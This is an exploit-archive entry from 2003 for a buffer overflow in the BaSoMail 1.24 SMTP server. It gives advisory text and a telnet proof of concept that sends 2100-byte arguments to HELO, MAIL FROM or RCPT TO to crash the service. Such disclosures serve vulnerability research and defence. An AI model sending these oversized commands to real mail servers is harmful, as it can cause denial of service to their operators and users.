BaSoMail 1.24 - SMTP Server Command Buffer Overflow

Author: Ziv Kamir
type: dos
platform: windows
port: 
date_added: 2003-05-28  
date_updated: 2012-11-13  
verified: 1  
codes: OSVDB-50541  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22668.txt  
source: https://www.securityfocus.com/bid/7726/info

BaSoMail SMTP Server has been reported prone to a buffer overflow vulnerability.

The issue is likely due to a lack of sufficient bounds checking performed on arguments passed to SMTP commands.

Although unconfirmed and speculative, due to the nature of this vulnerability, it may be possible to exploit this issue to execute arbitrary attacker supplied code.

# Telnet The_SMTP_Server_IP_Address 25
220 Welcome to BaSoMail (www.BaSo.no)
HELO <ccccc....[Buffer size 2100 Bytes]>
Or
Mail From : <ccccc....[Buffer size 2100 Bytes @xyz.com]>
Or
Rcpt to : <ccccc....[Buffer size 2100 Bytes @xyz.com]>
Quit